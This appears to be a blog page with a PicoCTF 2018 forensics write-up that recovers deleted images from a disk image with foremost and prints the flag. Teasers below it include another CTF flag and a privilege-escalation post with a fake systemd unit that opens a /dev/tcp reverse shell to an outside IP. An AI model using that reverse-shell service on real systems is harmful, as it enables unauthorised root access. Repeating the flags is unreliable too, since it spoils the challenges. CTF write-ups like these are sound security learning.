Skip to main content

PicoCTF2018 - Forensics - Recovering from the Snap


PicoCTF2018 - Forensics - Recovering from the Snap

Objective:

There used to be a bunch of animals[1] here, what did Dr. Xernon do to them?


Hints:
(1) Some files have been deleted from teh disk image, but are they really gone?


Solution:

I used foremost to recover the files from the DD image.

let's mount the DD to see what is inside visible to my OS

@kali:/$ sudo mkdir /mnt/disk_image
@kali:/$ sudo mount -o loop -t auto /home/circusmonkey404/Downloads/animals.dd /mnt/disk_image

let's see whats in there

kali:/mnt/disk_image$ ls
dachshund.jpg  frog.jpg  music.jpg  rabbit.jpg

4 files named after animals

let's through Foremost at it and see what it finds

kali:/mnt/disk_image$ ls
dachshund.jpg  frog.jpg  music.jpg  rabbit.jpg

Let's check and see what foremost found

@kali:~/Downloads$ ls
animals.dd  husky.png  incidents.json  output_Tue_Sep_24_10_45_31_2019  passwd


@kali:~/Downloads$ cd output_Tue_Sep_24_10_45_31_2019/
@kali:~/Downloads/output_Tue_Sep_24_10_45_31_2019$
ls

let's check audit.txt


here is the output from cat

@kali:~/Downloads/output_Tue_Sep_24_10_45_31_2019$ cat audit.txt
Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus
Audit File

Foremost started at Tue Sep 24 10:45:31 2019
Invocation: foremost -T animals.dd
Output directory: /home/*********/Downloads/output_Tue_Sep_24_10_45_31_2019
Configuration file: /etc/foremost.conf
------------------------------------------------------------------
File: animals.dd
Start: Tue Sep 24 10:45:31 2019
Length: 10 MB (10485760 bytes)

Num     Name (bs=512)           Size     File Offset     Comment

0:    00000077.jpg          617 KB           39424    
1:    00001313.jpg          481 KB          672256    
2:    00002277.jpg          380 KB         1165824    
3:    00003041.jpg          248 KB         1556992    
4:    00003541.jpg          314 KB         1812992    
5:    00004173.jpg          458 KB         2136576    
6:    00005093.jpg          383 KB         2607616    
7:    00005861.jpg           39 KB         3000832    
Finish: Tue Sep 24 10:45:31 2019

8 FILES EXTRACTED
   
jpg:= 8
------------------------------------------------------------------

Foremost finished at Tue Sep 24 10:45:31 2019


8 files extracted, that's more then the 4 we saw originally

lets check out the jpgs found in the jpg folder

opening it up in the GUI

Here is the picture with the flag 00005861.jpg

picoCTF{th3_5n4p_happ3n3d}



















Comments

Popular posts from this blog

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar